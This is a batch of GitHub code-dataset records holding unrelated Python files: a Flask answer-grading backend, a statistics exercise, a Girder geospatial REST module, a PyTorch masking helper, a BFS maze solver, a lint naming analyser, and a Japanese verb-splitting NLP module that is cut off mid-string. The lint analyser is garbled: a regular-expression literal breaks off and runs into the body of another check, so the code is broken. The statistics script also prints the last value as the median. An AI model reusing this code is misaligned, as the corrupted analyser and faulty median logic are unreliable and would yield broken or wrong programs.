request.form[\"srn\"]\n total = int(request.form[\"marks\"])\n model = request.form[\"model\"]\n answer = request.form[\"answer\"]\n user = session[\"username\"]\n\n print(\"Ola\", name, srn)\n\n student = Student.query.filter_by(name=name, srn=srn).first()\n if(student is None):\n student = Student(name=name, srn=srn)\n db.session.add(student)\n db.session.commit()\n\n student_id = Student.query.filter_by(\n name=name, srn=srn).first().student_id\n marks = evalulate_answer(model, answer)*total\n\n answer = Answer(student_id=student_id, total=total,\n marks=marks, model=model, answer=answer, user=user)\n db.session.add(answer)\n db.session.commit()\n\n return render_template(\"add.html\", user=session[\"username\"])\n\n\n@application.route('/logout/')\ndef logout():\n session.pop(\"username\")\n return redirect(\"/login.html/\")\n\n\ndef evalulate_answer(model, answer):\n alpha = 0.3\n beta = 0.25\n pattern_score = Ngrams(model)*Ngrams(answer)\n common_score = common(model, answer)\n print(\"Scores: \", pattern_score, common_score)\n if(pattern_score == 0 or common_score == 0):\n return 0\n\n return round(min(1, alpha*pattern_score+(1-alpha)*common_score+beta), 2)\n\n\nif __name__ == \"__main__\":\n db.create_all()\n application.run()\n","repo_name":"rananth99/Automatic-Answer-Evaluation-Website","sub_path":"backend.py","file_name":"backend.py","file_ext":"py","file_size_in_byte":9220,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"18298836105","text":"#central-native Module 2 Project\r\n\"\"\"Values to calculate central tendancy \"\"\"\r\n\r\n#Initialization phase\r\ntotal = 0 # sum of values\r\nvalue_counter = 0 \r\nvalues = [47, 95, 88, 73, 88, 84] # list of values\r\n\r\n#processing phase\r\nfor value in values:\r\n total += value #add current value to running total\r\n value_counter += 1 #indicate one more value processed\r\n\r\n#termination phase\r\naverage = total / value_counter\r\nprint(f'The values mean is {average:.2f}')\r\nprint(f'The sum of the values is {total}')\r\nprint(f'The count of values is {value_counter}')\r\nprint(f'The median of the values is {value}')\r\n#to get mode had to do this\r\nvalues = [47, 95, 88, 73, 88, 84]\r\noccurrences = []\r\nfor item in values :\r\n count = 0\r\n for x in values :\r\n if x == item :\r\n count += 1\r\n occurrences.append(count)\r\n\r\nduplicates = set()\r\nindex = 0\r\nwhile index < len(values) :\r\n if occurrences[index] != 1 :\r\n duplicates.add(values[index])\r\n index += 1\r\n\r\nprint(f'The Mode value is {duplicates}')","repo_name":"jcreech72/608-mod2","sub_path":"central-native.py","file_name":"central-native.py","file_ext":"py","file_size_in_byte":1020,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"11990436568","text":"from tempfile import NamedTemporaryFile\nimport pkg_resources\nimport inspect\nfrom girder.api import access\nfrom girder.api.describe import autoDescribeRoute, describeRoute, Description\nfrom girder.api.rest import boundHandler, filtermodel\nfrom girder.exceptions import ValidationException, FilePathException\nfrom girder.models.item import Item\nfrom girder.models.file import File\nfrom girder.constants import AccessType\nfrom girder.utility._cache import cache\nfrom geometa.schema import OpenSearchGeoSchema, BaseSchema\nfrom .constants import (\n GEOSPATIAL_FIELD,\n GEOSPATIAL_SUBDATASETS_FIELD,\n GEOMETA_FIELD\n)\nfrom .exceptions import CannotHandleError\nfrom marshmallow import 
from marshmallow import ValidationError\n\n\ndef _find(user, query):\n    cursor = Item().find(query)\n\n    return list(Item().filterResultsByPermission(\n        cursor, user, AccessType.READ))\n\n\ndef get_documents_by_geometry(user, geometry, relation):\n    query = {\n        '$or': [\n            {\n                GEOSPATIAL_FIELD: {\n                    relation: {\n                        '$geometry': geometry\n                    }\n                }\n            },\n            {\n                GEOSPATIAL_SUBDATASETS_FIELD: {\n                    relation: {\n                        '$geometry': geometry\n                    }\n                }\n            }\n        ]\n\n    }\n    return _find(user, query)\n\n\ndef get_documents_by_radius(user, latitude, longitude, radius):\n    RADIUS_OF_EARTH = 6378137.0  # average in meters\n    query = {\n        GEOSPATIAL_FIELD: {\n            '$geoWithin': {'$centerSphere': [\n                [longitude, latitude],\n                radius / RADIUS_OF_EARTH]}\n        }\n    }\n\n    return _find(user, query)\n\n\ndef _get_geometa(girder_item, girder_file, path):\n    metadata = {}\n    for entry_point_name, [handler, args] in get_type_handlers().items():\n        kwargs = {}\n        if 'girder_item' in args:\n            kwargs['girder_item'] = girder_item\n        if 'girder_file' in args:\n            kwargs['girder_file'] = girder_file\n        try:\n            metadata = handler(path, **kwargs)\n        except CannotHandleError:\n            pass\n\n    return metadata\n\n\ndef _get_geometa_from_filesystem(girder_item, girder_file):\n    path = File().getLocalFilePath(girder_file)\n    return _get_geometa(girder_item, girder_file, path)\n\n\ndef _get_geometa_from_remote_assetstore(girder_item, girder_file):\n    with NamedTemporaryFile() as f:\n        for data in File().download(girder_file, headers=False)():\n            f.write(data)\n        return _get_geometa(girder_item, girder_file, f.name)\n\n\n@cache.cache_on_arguments()\ndef get_type_handlers():\n    entry_points = pkg_resources.iter_entry_points('geometa.types')\n    return {e.name: [e.load(), inspect.getargspec(e.load()).args]\n            for e in entry_points}\n\n\ndef get_geometa(girder_item, girder_file):\n    try:\n        return _get_geometa_from_filesystem(girder_item, girder_file)\n    except FilePathException:\n        return _get_geometa_from_remote_assetstore(girder_item, girder_file)\n\n\ndef create_geometa(girder_item, girder_file, metadata=None):\n    if not metadata:\n        metadata = get_geometa(girder_item, girder_file)\n\n    if metadata:\n        schema = BaseSchema()\n        schema.load(metadata)\n        girder_item[GEOMETA_FIELD] = metadata\n        Item().save(girder_item)\n        Item().collection.create_index([(GEOSPATIAL_FIELD, \"2dsphere\")])\n        return girder_item\n    else:\n        return None\n\n\n@access.public\n@boundHandler\n@autoDescribeRoute(\n    Description('Get geospatial metadata for a given item')\n    .modelParam('id', 'The ID of the item that will have geospatial metadata.',\n                model=Item, level=AccessType.READ)\n)\ndef geometa_get_handler(self, item):\n    girder_file = [i for i in Item().childFiles(item, limit=1)][0]\n    try:\n        return item[GEOMETA_FIELD]\n    except KeyError:\n        return get_geometa(item, girder_file)\n\n\n@access.public\n@filtermodel(model=Item)\n@boundHandler\n@autoDescribeRoute(\n    Description('Set geospatial metadata for a given item')\n    .modelParam('id', 'The ID of the item that will have geospatial metadata.',\n                model=Item, level=AccessType.READ)\n    .jsonParam('geometa', 'Json object to save as geospatial metadata',\n               required=False, default=None, requireObject=True)\n)\ndef geometa_create_handler(self, item, geometa):\n    girder_file = None\n    if not geometa:\n        girder_file = [i for i in Item().childFiles(item, limit=1)][0]\n    try:\n        return create_geometa(item, girder_file, geometa)\n    except ValidationError as e:\n        raise ValidationException(e.messages)\n\n\n@access.public\n@boundHandler\n@describeRoute(\n    Description('Query for the items that match the given geospatial criteria')\n
criteria')\n .param('latitude', 'Latitude of the search point', required=False)\n .param('longitude', 'Longitude of the search point', required=False)\n .param('radius', 'Radius of the search circle', required=False)\n .param('relation', 'Relation parameter for the query', required=False)\n .param('bbox', 'Bounding box parameter', required=False)\n .param('geometry', 'Geojson geometry for the query in wkt format',\n required=False)\n .param('geojson', 'Geojson geometry for the query', required=False)\n)\ndef geometa_search_handler(self, params):\n schema = OpenSearchGeoSchema()\n user = self.getCurrentUser()\n try:\n params = schema.load(params)\n except ValidationError as e:\n raise ValidationException(e.messages)\n documents = []\n\n if 'geometry' in params:\n documents = get_documents_by_geometry(user,\n params['geometry'],\n params['relation'])\n elif 'bbox' in params:\n documents = get_documents_by_geometry(user,\n params['bbox'],\n params['relation'])\n elif 'latitude' in params:\n documents = get_documents_by_radius(user,\n params['latitude'],\n params['longitude'],\n params['radius'])\n elif 'geojson' in params:\n documents = get_documents_by_geometry(user,\n params['geojson'],\n params['relation'])\n\n return documents\n","repo_name":"OpenGeoscience/girder_geospatial","sub_path":"geometa/rest.py","file_name":"rest.py","file_ext":"py","file_size_in_byte":6505,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"37"} +{"seq_id":"74140651947","text":"\"\"\"emdMain.py : project main\n\n__author__ : group 04\n__version__ : 1.0\n__credits__ : [Diogo Araújo, Diogo Rebelo, Joel Araújo]\n\"\"\"\n\nfrom EMDsParser import *\nfrom Queries import *\nfrom htmlGenerator import *\n\n## load data from csv file\nemdDS = loadDataStructure.buildData(\"dataset/emd.csv\")\n\n## dates\ndatesIndicators.datesIndicatorsHtml(\"html/datesIndicators.html\", emdDS[0])\ndateStudy.datesGraph(emdDS[0])\n\n## age&Gender\nageGenderDetails = genderAgeQueries.getGenderDetails(emdDS[0])\nageGenderSorted = ageGenderDetails[1]\ngenderDetais = genderAgeQueries.calculateGenderDetails(ageGenderDetails)\ngenderAgeQueries.genderAge_Graph(ageGenderDetails)\ngenderAgeQueries.allYearsPieGraph(genderDetais)\ngenderAgeQueries.createBarGraphGender(genderDetais)\nageGenderIndicators.ageGenderIndicatorsHtml(\"html/ageGenderIndicators.html\", ageGenderSorted)\n\n## gender\ngenderIndicators.genderIndicatorsHTML(\"html/genderIndicators.html\", emdDS[0])\n\n## address\naddresses = addresStudy.getAddress(emdDS[0])\naddressIndicators.addressIndicatorsHtml(\"html/addressIndicators.html\", addresses)\naddresStudy.createBarGraphAdress(addresses)\n\n## federated and med results\nfitAndfed = fitFederated.findAptosDic(emdDS[0])\nfitFederated.createBarGraphAptos(fitAndfed)\nfitFederated.createBarGraphFed(fitAndfed)\n\n## modality\nmodalities = modalityStudy.getModalities(emdDS[0])\nmodalitiesInfo = modalityStudy.calculateModalitiesInfo(modalities)\nmodalityIndicators.modalityIndicatorsHtml(\"html/modalityIndicators.html\", modalities)\nmodalityStudy.modalidades_Graph(modalitiesInfo)\nmodalityStudy.mod_graph_AllYears(modalitiesInfo[0])\n\nfedIndicators.federatedIndicatorsHTML(\"html/federatedIndicators.html\", fitAndfed)\nmedResultsIndicators.medResultsIndicatorsHtml(\"html/medicalResultsIndicators.html\", 
fitAndfed)\n\nindex.indexHTML(emdDS)","repo_name":"DMdSA/PL-Projetos","sub_path":"TP01/src/emdMain.py","file_name":"emdMain.py","file_ext":"py","file_size_in_byte":1795,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"17256197552","text":"# -*- coding: utf-8 -*-\nimport torch\n\n\ndef mask_fill(\n fill_value: float,\n tokens: torch.Tensor,\n embeddings: torch.Tensor,\n padding_index: int,\n) -> torch.Tensor:\n \"\"\"\n Function that masks embeddings representing padded elements.\n :param fill_value: the value to fill the embeddings belonging to padded tokens.\n :param tokens: The input sequences [bsz x seq_len].\n :param embeddings: word embeddings [bsz x seq_len x hiddens].\n :param padding_index: Index of the padding token.\n \"\"\"\n padding_mask = tokens.eq(padding_index).unsqueeze(-1)\n return embeddings.float().masked_fill_(padding_mask, fill_value).type_as(embeddings)\n","repo_name":"ricardorei/lightning-text-classification","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":695,"program_lang":"python","lang":"en","doc_type":"code","stars":202,"dataset":"github-code","pt":"37"} +{"seq_id":"13618569732","text":"from collections import deque\n\nMAX_INT = 1000 * 1000 + 1\nN, M = tuple(map(int, input().split()))\ngrid = [list(map(int, list(input()))) for _ in range(N)]\ndist = [[[-1] * 2 for _ in range(M)] for _ in range(N)]\n\n\ndef in_range(r, c):\n return 0 <= r < N and 0 <= c < M\n\n\ndef can_go_wall(r, c, count):\n return in_range(r, c) and count == 0 and grid[r][c] == 1 and dist[r][c][count + 1] == -1\n\n\ndef can_go_blank(r, c, count):\n return in_range(r, c) and grid[r][c] == 0 and dist[r][c][count] == -1\n\n\ndef bfs(sy, sx):\n dys, dxs = [-1, 1, 0, 0], [0, 0, -1, 1]\n\n queue = deque()\n queue.append((sy, sx, 0))\n dist[sy][sx][0] = 1\n\n while queue:\n y, x, count = queue.popleft()\n for i in range(4):\n ny, nx = y + dys[i], x + dxs[i]\n # if there is no wall\n if can_go_blank(ny, nx, count):\n dist[ny][nx][count] = dist[y][x][count] + 1\n queue.append((ny, nx, count))\n # if there is a wall\n if can_go_wall(ny, nx, count):\n dist[ny][nx][count + 1] = dist[y][x][count] + 1\n queue.append((ny, nx, count + 1))\n\n\nbfs(0, 0)\n\nif dist[N - 1][M - 1][0] == -1:\n dist[N - 1][M - 1][0] = MAX_INT\nif dist[N - 1][M - 1][1] == -1:\n dist[N - 1][M - 1][1] = MAX_INT\nanswer = min(dist[N - 1][M - 1])\n\nif answer == MAX_INT:\n print(-1)\nelse:\n print(answer)\n\n'''\n6 4\n0100\n1110\n1000\n0000\n0111\n0000\n'''\n","repo_name":"hyeyoungs/ProblemSolving","sub_path":"Graph/Baek_2206.py","file_name":"Baek_2206.py","file_ext":"py","file_size_in_byte":1421,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"36380564256","text":"\"\"\"Naming analyser, checks everything name related\"\"\"\nimport re\nfrom astroid import AssignName, AssignAttr, For, Call, FunctionDef\n\nfrom .analyser import Analyser, register_check\n\n\nclass NamingAnalyser(Analyser):\n \"\"\"Analyse good naming\"\"\"\n SNAKE_CASE = re.compile(r\"[a-z_][a-z0-9_]{0,30}$\")\n CONSTANT_SNAKE_CASE = re.compile(r\"(([A-Z_][A-Z0-9_]*)|(__.*__))$\")\n HUNGARIAN_NOTATION = re.compile(r\"(?= 3:\n continue\n\n results.append((filename, node.lineno, node.name,\n node.parent.as_string().splitlines()[0]))\n return results\n\n @register_check(error_format=\"{}:{}: Hungarian notation variable '{}':\\n\"\n \"\\t{}\")\n def check_hungarian_notation_variable(self):\n \"\"\"Checks for 
variable names with hungarian notation \"\"\"\n results: list[tuple[str, int, str, str]] = []\n for filename, attr in self._sources.items():\n for node in attr.tree.pre_order():\n if not isinstance(node, AssignName):\n continue\n if not self.HUNGARIAN_NOTATION.search(node.name):\n continue\n results.append((filename, node.lineno, node.name,\n node.parent.as_string().splitlines()[0]))\n return results\n\n @register_check(error_format=\"{}:{}: Hungarian notation attribute '{}':\\n\"\n \"\\t{}\")\n def check_hungarian_notation_attribute(self):\n \"\"\"Checks for attribute names with hungarian notation \"\"\"\n results: list[tuple[str, int, str, str]] = []\n for filename, attr in self._sources.items():\n for node in attr.tree.pre_order():\n if not isinstance(node, AssignAttr):\n continue\n if not self.HUNGARIAN_NOTATION.search(node.attrname):\n continue\n results.append((filename, node.lineno, node.attrname,\n node.parent.as_string().splitlines()[0]))\n return results\n\n @register_check(error_format=\"{}:{}: Hungarian notation in function/method \"\n \"name '{}':\\n\\t{}\")\n def check_hungarian_notation_method(self):\n \"\"\"Checks for hungarian notation function and method naming \"\"\"\n results: list[tuple[str, int, str, str]] = []\n for filename, attr in self._sources.items():\n for node in attr.tree.pre_order():\n if not isinstance(node, FunctionDef):\n continue\n if not self.HUNGARIAN_NOTATION.search(node.name):\n continue\n results.append((filename, node.lineno, node.name,\n node.as_string().strip().splitlines()[0]))\n return results\n\n @register_check(\"{}:{}: Variables defined at global scope should be \"\n \"treated as constants:\\n\\t{}\")\n def check_constant_naming(self):\n \"\"\"Checks if constants are named in UPPER_SNAKE_CASE\"\"\"\n # lineno, line\n results: list[tuple[str, int, str]] = []\n for filename, attr in self._sources.items():\n for node in attr.tree.get_root().get_children():\n if not isinstance(node, AssignName):\n continue\n if self.CONSTANT_SNAKE_CASE.fullmatch(node.name):\n # already UPPER_SNAKE_CASE (or a dunder), nothing to report\n continue\n results.append((filename, node.lineno, node.as_string()))\n return results\n\n @staticmethod\n def _is_for_range_variable(node: AssignName):\n \"\"\"Check if the assignment is for a variable for a for range loop \"\"\"\n parent = node.parent\n if not isinstance(parent, For):\n return False\n iter_on = parent.iter\n if not isinstance(iter_on, Call):\n return False\n return iter_on.func.as_string() == \"range\"\n","repo_name":"mike-fam/mikelint","sub_path":"mikelint/analysers/naming.py","file_name":"naming.py","file_ext":"py","file_size_in_byte":7079,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"17303743309","text":"import csv\n\n\ndef get_books(with_name: str):\n books = []\n with open('books.csv', 'r', encoding='utf-8') as file:\n reader = csv.reader(file, delimiter='|')\n for row in reader:\n if with_name.lower() in row[1].lower():\n books.append(row)\n\n return books\n\n\ndef get_totals(books):\n books_info = []\n\n for book_values in books:\n try:\n quantity_price = float(book_values[3]) * float(book_values[4])\n if quantity_price < 500:\n quantity_price += 100\n\n books_info.append((book_values[0], str(quantity_price)))\n except ValueError:\n print(f'Incorrect values in book ({book_values})')\n\n return books_info\n\n\nbooks = get_books('python')\nprint(books)\n\nbooks_info = 
get_totals(books)\nprint(books_info)\n","repo_name":"Gerkul/University","sub_path":"Python/practice7/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":813,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"24294682176","text":"from chunker import ChunkExtractor\nfrom sub_verb_dic import SubVerbDic\nfrom case_information_get import CaseExtractor\nfrom special_verb_dic import SpecialVerb\nimport re\n\nclass VerbSpliter:\n\n    def __init__(self):\n        \"\"\"\n        The `__init__` method runs when the class is instantiated.\n        \"\"\"\n        chunker = ChunkExtractor()\n        self.connect_word = chunker.connect_word\n        self.num_chunk = chunker.num_chunk\n        self.verb_chunk = chunker.verb_chunk\n        self.compaound = chunker.compaound\n        c_g = CaseExtractor()\n        self.case_get = c_g.case_get\n        s_v = SpecialVerb()\n        self.campany_special_verb = s_v.campany_special_verb\n\n\n    \"\"\"\n    Case markers whose arguments are not split\n    \"\"\"\n    not_devide_case_dic = [\"により\", \"などに\", \"へ\", \"から\", \"には\"]\n\n\n    \"\"\"\n    Check whether a word is an auxiliary verb\n    \"\"\"\n    def sub_verb_chek(self, check_w, verb, *doc):\n        s_v_dic = SubVerbDic()\n        check_word = check_w\n        if check_word[-2:] == 'する' and check_word != 'する':\n            check_word = check_word[:-2]\n        if check_word[-4:] == '(する)' and check_word != '(する)':\n            check_word = check_word[:-4]\n        if check_word[-3:] == '(だ)' and check_word != '(だ)':\n            check_word = check_word[:-3]\n        if check_word[-4:] == '(です)' and check_word != '(です)':\n            check_word = check_word[:-4]\n        if check_word[-2:] == 'こと' and check_word != 'こと':\n            check_word = doc[verb[\"lemma_start\"]].lemma_\n        if check_word in s_v_dic.sub_verb_dic:\n            return True\n        return False\n\n\n    \"\"\"\n    Search for the obj of a given predicate\n    \"\"\"\n    def object_serch(self, start, *doc):\n        for token in doc:\n            if token.head.i == start and token.dep_ == 'obj':\n                self.num_chunk(token.i, *doc)\n        return ''\n\n    \"\"\"\n    Check whether two katakana words form a compound verb\n    \"\"\"\n    def all_katakana(self, word1, word2):\n        re_katakana = re.compile(r'[\\u30A1-\\u30F4ー]+')\n        if re_katakana.fullmatch(word1) and re_katakana.fullmatch(word2):\n            return True\n        return False\n\n\n\n    \"\"\"\n    Split the predicate contained in an object\n\n    ret : object + main predicate + main-predicate start + main-predicate end\n    \"\"\"\n    def object_devide(self, start, end, case, argument, predicate, *doc):\n        compound_word = ['商品', '技術', '製品', '無料', '限定', '特別', '本格', '社会', '新', '国内', '顧客', '一般', '全国', '早期', '事前'] # common nouns that are allowed to form compound verbs\n\n        if start == end and \"連体修飾\" not in case:\n            if (doc[start - 1].lemma_ == 'と' or doc[start - 1].lemma_ == 'や') and self.case_get(start, *doc) == 'を':\n                return {'object': '', 'verb': self.compaound(start, end, *doc) + 'する', 'verb_start': start, 'verb_end': end}\n            else:\n                return {'object': self.compaound(start, end, *doc), 'verb': '', 'verb_start': -1, 'verb_end': -1}\n        for i in reversed(range(start, end + 1)):\n            if doc[i].pos_ == 'PUNCT' and i != end:\n                break\n            if doc[i].lemma_ == 'の' and doc[i].pos_ == 'ADP' and doc[i - 1].tag_ != '形状詞-一般' and doc[i - 1].lemma_ != 'へ' and doc[i - 1].lemma_ != 'と' and doc[i - 1].lemma_ != 'で' and len(doc) > i + 1 and doc[i + 1].pos_ != 'ADJ' and len(doc) > end + 1 and doc[end + 1].lemma_ != 'で': # split on の; への is an exception\n                if i == start:\n                    break\n                if \"省\" == doc[i - 1].lemma_[-1:] or \"庁\" == doc[i - 1].lemma_[-1:] or \"政府\" == doc[i - 1].lemma_[-2:]:\n                    break\n                if doc[end].tag_ == '名詞-普通名詞-サ変可能' and i + 4 >= end: # allow compound predicates of up to four words\n                    if doc[end - 1].pos_ == 'NOUN' and doc[end - 1].tag_ != '名詞-普通名詞-サ変可能' and doc[end - 1].lemma_ not in compound_word and not self.all_katakana(doc[end - 1].lemma_, doc[end].lemma_):\n                        break\n                    return {'object': self.compaound(start, i - 1, *doc), 
'verb': self.compaound(i + 1, end, *doc) + 'する', 'verb_start': i + 1, 'verb_end': end, \"case\": \"の\"}\n                elif doc[end].tag_ == '補助記号-括弧閉' and doc[end - 1].tag_ == '名詞-普通名詞-サ変可能' and i + 4 >= end: # allow compound predicates of up to four words; object wrapped in brackets\n                    if doc[end - 2].pos_ == 'NOUN' and doc[end - 2].tag_ != '名詞-普通名詞-サ変可能' and doc[end - 2].lemma_ not in compound_word and not self.all_katakana(doc[end - 2].lemma_, doc[end - 1].lemma_):\n                        break\n                    return {'object': self.compaound(start, i - 1, *doc) + doc[end].orth_, 'verb': self.compaound(i + 1, end - 1, *doc) + 'する', 'verb_start': i + 1, 'verb_end': end - 1, \"case\": \"の\"}\n            elif doc[i].lemma_ == 'こと' and len(doc) > i + 1 and (doc[i + 1].lemma_ == 'の' or doc[i + 1].lemma_ == 'を' or doc[i + 1].lemma_ == 'が'): # handles patterns like 〇〇することの発表を + 行う\n                not_special = False\n                for c_pt in reversed(range(0, i - 1)):\n                    if doc[c_pt].head.i == i:\n                        if (doc[c_pt].lemma_ == '導入' or doc[c_pt].lemma_ == '発足') and doc[c_pt - 1].lemma_ == 'が':\n                            not_special = True\n                            break\n                        if doc[c_pt].lemma_ not in self.campany_special_verb:\n                            not_special = True\n                            break\n                if not_special: # 〜こと is only split for company-specific predicates\n                    continue\n                for predic in predicate:\n                    if predic[\"lemma_start\"] == start:\n                        for arg in argument:\n                            if arg[\"predicate_id\"] == predic[\"id\"] and arg[\"case\"] == \"を\":\n                                if doc[i - 1].lemma_ == 'する':\n                                    return {'object': arg[\"lemma\"], 'verb': self.compaound(start, i - 2, *doc) + 'する', 'verb_start': start, 'verb_end': end - 2, 'new_object_start': arg[\"lemma_start\"], 'new_object_end': arg[\"lemma_end\"]}\n                                if doc[i - 2].lemma_ == 'する' and doc[i - 1].lemma_ == 'た':\n                                    return {'object': arg[\"lemma\"], 'verb': self.compaound(start, i - 3, *doc) + 'する', 'verb_start': start, 'verb_end': end - 3, 'new_object_start': arg[\"lemma_start\"], 'new_object_end': arg[\"lemma_end\"]}\n\n                if doc[start - 1].pos_ != 'ADP':\n                    return {'object': self.compaound(start, end, *doc), 'verb': '', 'verb_start': -1, 'verb_end': -1}\n                if doc[i - 1].lemma_ == 'する':\n                    if doc[start - 2].tag_ == '補助記号-括弧閉' or doc[start - 2].lemma_ == '\"':\n                        new_obj = self.num_chunk(start - 3, *doc)\n                    else:\n                        new_obj = self.num_chunk(start - 2, *doc)\n                    if new_obj and doc[new_obj[\"lemma_end\"] + 1].lemma_ != 'に':\n                        return {'object': new_obj[\"lemma\"], 'verb': self.compaound(start, i - 2, *doc) + 'する', 'verb_start': start, 'verb_end': end - 2, 'new_object_start': new_obj[\"lemma_start\"], 'new_object_end': new_obj[\"lemma_end\"]}\n                    else:\n                        return {'object': '', 'verb': self.compaound(start, i - 2, *doc) + 'する','verb_start': start, 'verb_end': end - 2}\n                if doc[i - 2].lemma_ == 'する' and doc[i - 1].lemma_ == 'た':\n                    if doc[start - 2].tag_ == '補助記号-括弧閉':\n                        new_obj = self.num_chunk(start - 3, *doc)\n                    else:\n                        new_obj = self.num_chunk(start - 2, *doc)\n                    if new_obj:\n                        return {'object': new_obj[\"lemma\"], 'verb': self.compaound(start, i - 3, *doc) + 'する','verb_start': start, 'verb_end': end - 3, 'new_object_start': new_obj[\"lemma_start\"], 'new_object_end': new_obj[\"lemma_end\"]}\n                    else:\n                        return {'object': '', 'verb': self.compaound(start, i - 3, *doc) + 'する','verb_start': start, 'verb_end': end - 3}\n                if doc[i - 1].pos_ == 'VERB': # verb + こと + (を、の、が)\n                    new_verb = self.verb_chunk(start, *doc)\n                    adp_pt = -1\n                    for adp_pt in reversed(range(0, new_verb[\"lemma_start\"] - 1)): # look for an independent word across the particle\n                        if doc[adp_pt].pos_ != 'ADP':\n                            break\n                    new_obj = self.num_chunk(adp_pt, *doc)\n                    if new_obj:\n                        return {'object': new_obj[\"lemma\"], 'verb': new_verb[\"lemma\"], 'verb_start': new_verb[\"lemma_start\"], 'verb_end': new_verb[\"lemma_end\"], 'new_object_start': 
new_obj[\"lemma_start\"], 'new_object_end': new_obj[\"lemma_end\"]}\n else:\n return {'object': '', 'verb': new_verb[\"lemma\"], 'verb_start': new_verb[\"lemma_start\"], 'verb_end': new_verb[\"lemma_end\"]}\n p_id = -1\n rentai_f = False\n for c_arg in argument:\n if start >= c_arg[\"lemma_start\"] and start <= c_arg[\"lemma_end\"]:\n p_id = c_arg[\"predicate_id\"]\n break\n for c_arg in argument:\n if c_arg[\"predicate_id\"] == p_id and \"連体修飾\" in c_arg[\"case\"]:\n rentai_f = True\n break\n if (\"連体修飾\" in case or ((case == \"の\" or case == \"を\") and not rentai_f) and \"サ変可能\" in doc[end].tag_):\n return {'object': \"\", 'verb': self.compaound(start, end, *doc) + 'する','verb_start': start, 'verb_end': end}\n return {'object': self.compaound(start, end, *doc), 'verb': '', 'verb_start': -1, 'verb_end': -1}\n\n\n \"\"\"\n 複合術部を主述部と補助術部に分割\n \n ret : 主述部 + 補助術部 + 主述始点 + 主述部終点 + 補助述部始点 + 補助述部終点\n \"\"\"\n def verb_devide(self, start, end, *doc):\n s_v_dic = SubVerbDic()\n if start == end:\n return {'verb': self.compaound(start, end, *doc), 'sub_verb': '', 'verb_start': start, 'verb_end': end, 'sub_verb_start': -1, 'sub_verb_end': -1}\n for i in reversed(range(start, end + 1)):\n if i > start and (doc[i - 1].tag_ == '動詞-一般' or doc[i - 1].tag_ == \"名詞-普通名詞-形状詞可能\"):\n continue\n if i + 1 < len(doc) and doc[i + 1].pos_ == \"NOUN\" and not doc[i + 1].norm_ in s_v_dic.sub_verb_dic:\n continue\n if doc[i].norm_ in s_v_dic.sub_verb_dic:\n if doc[i - 1].tag_ != '名詞-普通名詞-サ変可能' and doc[i - 1].pos_ != \"SCONJ\": # 本格始動 など普通名詞との合成\n if doc[end].lemma_ == 'ため' or doc[end].lemma_ == 'もの' or doc[end].lemma_ == 'とき' or doc[end].lemma_ == '際' or doc[end].lemma_ == 'こと' or doc[end].lemma_ == '場合' or doc[end].lemma_ == '人' or doc[end].lemma_ == 'とき':\n return {'verb': '', 'sub_verb': self.compaound(i, end, *doc) + 'だ', 'verb_start': -1, 'verb_end': -1, 'sub_verb_start': i, 'sub_verb_end': end}\n elif doc[end].tag_ == '名詞-普通名詞-サ変可能':\n # 京都にモデルハウス披露 → 京都に モデルハウスを 披露する\n# if doc[i - 1].tag_ == '名詞-普通名詞-一般' or (doc[i - 1].tag_ == '形状詞-一般' and doc[i - 1].head.i == i):\n# return {'verb': self.compaound(start, end, *doc), 'sub_verb': '', 'verb_start': start, 'verb_end': end, 'sub_verb_start': -1, 'sub_verb_end': -1}\n# return {'verb': '', 'sub_verb': self.compaound(i, end, *doc) + 'する', 'verb_start': -1, 'verb_end': -1, 'sub_verb_start': i, 'sub_verb_end': end}\n if doc[i - 1].lemma_ == \"初\":\n return {'verb': '', 'sub_verb': self.compaound(i - 1, end, *doc) + 'する', 'verb_start': -1,\n 'verb_end': -1, 'sub_verb_start': i, 'sub_verb_end': end,\n \"object\": self.compaound(start, i - 2, *doc), \"obj_start\": start, \"obj_end\": i - 2}\n else:\n return {'verb': '', 'sub_verb': self.compaound(i, end, *doc) + 'する', 'verb_start': -1,\n 'verb_end': -1, 'sub_verb_start': i, 'sub_verb_end': end,\n \"object\":self.compaound(start, i - 1, *doc), \"obj_start\": start, \"obj_end\": i - 1}\n elif doc[end].lemma_ == 'だ' or doc[end].lemma_ == 'です':\n return {'verb': '', 'sub_verb': self.compaound(i, end, *doc) , 'verb_start': -1,'verb_end': -1, 'sub_verb_start': i, 'sub_verb_end': end}\n elif doc[end].norm_ == '出来る':\n if doc[end - 1].pos_ == 'ADP':\n return {'verb': self.compaound(start, i - 2, *doc) + 'する', 'sub_verb': 'できる', 'verb_start': start, 'verb_end': i - 2, 'sub_verb_start': end, 'sub_verb_end': end}\n else:\n return {'verb': self.compaound(start, i - 1, *doc) + 'する', 'sub_verb': 'できる', 'verb_start': start, 'verb_end': i - 1, 'sub_verb_start': end, 'sub_verb_end': end}\n elif doc[end - 3].norm_ == '出来る' and doc[end - 
2].orth_ == 'よう' and doc[end - 1].orth_ == 'に' and doc[end].norm_ == '成る':\n                        if doc[end - 4].pos_ == 'ADP':\n                            return {'verb': self.compaound(start, end - 5, *doc) + 'する', 'sub_verb': 'できるようになる', 'verb_start': start, 'verb_end': end - 5, 'sub_verb_start': end - 4, 'sub_verb_end': end}\n                        else:\n                            return {'verb': self.compaound(start, end - 4, *doc) + 'する', 'sub_verb': 'できるようになる', 'verb_start': start, 'verb_end': end - 4, 'sub_verb_start': end - 4, 'sub_verb_end': end}\n                    elif doc[end - 3].norm_ == '出来る' and doc[end - 2].orth_ == 'よう' and doc[end - 1].orth_ == 'に' and doc[end].norm_ == '為る':\n                        if doc[end - 4].pos_ == 'ADP':\n                            return {'verb': self.compaound(start, end - 5, *doc) + 'する', 'sub_verb': 'できるようにする', 'verb_start': start, 'verb_end': end - 5, 'sub_verb_start': end - 4, 'sub_verb_end': end}\n                        else:\n                            return {'verb': self.compaound(start, end - 4, *doc) + 'する', 'sub_verb': 